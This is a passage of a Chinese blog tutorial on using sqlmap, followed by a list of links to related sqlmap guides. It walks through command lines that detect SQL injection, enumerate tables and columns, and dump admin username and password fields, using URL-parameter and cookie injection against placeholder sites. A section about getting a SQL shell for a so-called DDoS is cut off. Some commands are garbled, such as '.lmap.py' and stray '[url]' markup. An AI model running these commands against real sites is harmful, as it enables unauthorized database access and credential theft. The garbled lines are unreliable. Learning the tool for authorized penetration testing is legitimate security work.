SQLMAP使用方法详解

最新推荐文章于 2024-03-15 12:55:55 发布
最新推荐文章于 2024-03-15 12:55:55 发布
阅读量509 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41757280/article/details/88396806
版权
本文详述了SQLMAP的多种用途,包括表和字段的猜解、Cookie注入、DDoS攻击、MySQL注入、POST登陆框注入、Google搜索注入、请求延迟、绕过WAF、查看权限、伪静态注入、执行命令与交互写shell等。通过实例展示了SQLMAP的具体使用步骤和相关命令选项。
摘要由CSDN通过智能技术生成

一共有11种常见SQLmap使用方法:


一、SQLMAP用于Access数据库注入

(1) 猜解是否能注入

1

2

win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7"

Linux : .lmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7"



(2) 猜解表

 

1

2

win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --tables

Linux: .lmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --tables



(3) 根据猜解的表进行猜解表的字段(假如通过2得到了admin这个表)

 

1

2

win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --columns -T admin

Linux: .lmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --columns -T admin



(4) 根据字段猜解内容(假如通过3得到字段为username和password)

 

1

2

3

win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --dump -T admin -C "username,password"

Linux: .lmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --dump -T admin -C

"username,[url=]B[/url]password"





二、SQLMAP用于Cookie注入

(1) cookie注入,猜解表

 

1

win : python sqlmap.py -u "http://www.xxx.org/jsj/shownews.asp" --cookie "id=31" --table --level 2




(2) 猜解字段,(通过1的表猜解字段,假如表为admin)

 

1

2

win :python sqlmap.py -u "http://www.xxx.org/jsj/shownews.asp" --cookie "id=31" --columns -T

admin --level 2




(3) 猜解内容

 

1

2

win :python sqlmap.py -u "http://www.xxx.org/jsj/shownews.asp" --cookie "id=31" --dump -T

admin -C "username,password" --level 2






三、SQLMAP用于mysql中DDOS攻击(1) 获取一个Shell

 

1

2

3

4

win:

python sqlmap.py -u [url]http://192.168.159.1/news.php?id=1[/url] --sql-shell

Linux:

sqlmap </
最低0.47元/天 解锁文章
利用SQLmap实现 SQL 注入
m0_71805735的博客
06-21 2535
利用SQLmap实现 SQL 注入
sqlmap使用教程
hmysn的博客
07-27 1万+
sqlmap是一个自动化的SQL注入工具,主要功能是扫描、发现,并利用给定url的SQL注入漏洞。
SQLMAP注入教程-11种常见SQLMAP使用方法详解
dfdhxb995397的博客
08-24 4525
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 一共有11种常见SQLmap使用方法:一、SQLMAP用于Access数据库注入(1) 猜解是否能注入 ...
SQL注入】Sqlmap使用指南(手把手保姆版)持续更新
最新发布
记录并分享学习安全的知识点..
03-15 2394
sqlmap 是一款开源的渗透测试工具,可以自动化进行SQL注入的检测、利用,并能接管数据库服务器。它具有功能强大的检测引擎,为渗透测试人员提供了许多专业的功能并且可以进行组合,其中包括数据库指纹识别、数据读取和访问底层文件系统,甚至可以通过带外数据连接的方式执行系统命令。python sqlmap.py -参数,sqlmap可以运行在python2.6、2.7和3.x的任何平台上。
使用SQLmap进行注入流程
weixin_62715196的博客
08-10 4001
主要讲述SQLmap的主要功能以及对单个目标如何进行注入
sqlmap使用详解
alohai的博客
06-03 504
最近需要使用sqlmap工具,在此将学习记录记录下来。 一、参数选项 1、选项: -h, --help 显示基本帮助信息并退出 -hh 显示高级帮助信息并退出 --version 显示程序的版本号并退出 -v VERBOSE 详细级别:0-6(默认为 1) 2、目标: 必须至少提供这些选项之一来定义 -u URL, --url=URL 目标 URL(例如“http://www.site.com/vuln.php?id=1”) -d DIRECT 用于直接数据库连接的连接字符串 -l LOGF
SQLmap使用指令详解
06-12
### SQLmap使用指令详解 #### 一、概述 SQLmap是一款功能强大的开源工具,用于自动化地检测和利用SQL注入漏洞。...通过深入了解SQLmap的功能和使用方法,我们可以更好地保护我们的Web应用免受潜在的安全威胁。
sqlmap注入使用教程
热门推荐
黑面狐
09-05 8万+
最近在学习SQL注入的东西。自己搭建了一个wavsep靶机,作为练习的对象,之后有空会写一个wavsep的教程。 首先下载安装sqlmap..github传送门:https://github.com/sqlmapproject/sqlmap/releases 一、sqlmap选项   目标:至少要选中一个参数     -u URL, --url=URL   目标为 URL (例如. "ht
sqlmap注入工具----一次简单的注入(实战)
weixin_33675507的博客
08-20 756
最近在学习网络安全,挖洞避免不了要使用许多工具,使用著名注入工具sqlmap的时候,对于英语不怎么好的我就比较难受了,本来就不会使用,加之又是英语的,简直难受。上网找了好多详细教程,但是命令实在是太多,感觉自己不可能一下就全部学会,于是决定一点一点慢慢来,用实战来慢慢熟悉这个工具的使用-----我相信通过每一次的记录我会慢慢变强! 这是墨者学院一个SQL注入漏洞靶场:http://219....
SQLmap注入教程
明哥哥知识分享
08-14 910
一次sqlmap注入点并且dump出账号密码全程 判断注入点:sqlmap.py -u “存在注入url” 爆出所有数据库名字:sqlmap.py -u “存在注入url” --dbs 查看当前使用账号:sqlmap.py -u “存在注入url” --current-user 1、查看当前数据库:sqlmap.py -u “存在注入url” --current-db 2、列出数据库中所有表:sqlmap.py -u “存在注入url”-D “当前数据库名” --tables。解释说明:-D是指定数据库
sql注入之——sqlmap教程
JieDG的博客
05-16 435
一、指定注入点 -u:指定注入点url 需要用户输入[Y/N],如果你懒得输入或者不懂怎么输入可以让程序自动输入,只需添加一个参数即可,命令如下: C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch 二、暴库 一条命令即可曝出该sqlserver中所有数据库名称,命令如下: C:\Python27\sqlmap>python sqlmap.py -u "http://
sqlmap注入实战教程(图文详解
weixin_49071539的博客
12-18 2万+
此教程使用靶场实战演示,仅供学习未经授权切勿用于非法用途 ! 1.发现此网址可能存在sql注入漏洞,我们进行sql盲注入测试一下是否存在漏洞。 地址栏输入 and 1=1 发现页面正常显示。 再次输入and 1=2 页面出现错误,说明该页面可能存在sql注入漏洞 2.现在拿出我们的kali工具,sqlmap进行注入测试。 sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs 3.可以看到存在注入漏洞,扫到了5个数据库。要获.
SQL注入之sqlmap入门教程
m0_56634355的博客
04-09 9297
sqlmapsql注入必备的也是最常用的工具,是每一位白帽子在的利器之一。
sqlmap注入教程linux,Linux Sqlmap检测sql注入漏洞工具安装使用教程
weixin_34239861的博客
05-03 539
Sqlmap工具什么是SQLmapSQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)sql注入概述:所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令它是利用现有应用程序,可以通过在Web表单中输入(恶意)SQL语句得到...
sqlmap
bylfsj的博客
09-23 6648
目录 Sqlmap Sqlmap的简单用法 探测指定URL是否存在WAF,并且绕过 探测指定URL是否存在SQL注入漏洞 查看数据库的所有用户 查看数据库所有用户名的密码  查看数据库当前用户  判断当前用户是否有管理权限 列出数据库管理员角色 查看所有的数据库 查看当前的数据库 爆出指定...
掌握SQL注入利器:SQLMap使用入门教程及技巧分享
分享Python知识
08-07 610
掌握SQL注入利器:SQLMap使用入门教程及技巧分享
sqlmap使用详解:自动化SQL注入工具
"sqlmap用户手册提供了全面的指南,涵盖了如何使用这个强大的SQL注入工具进行安全测试。手册详细解释了sqlmap的功能和操作流程,包括它如何检测和利用不同类型的SQL注入漏洞,以及支持的数据库类型。" sqlmap是一款...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值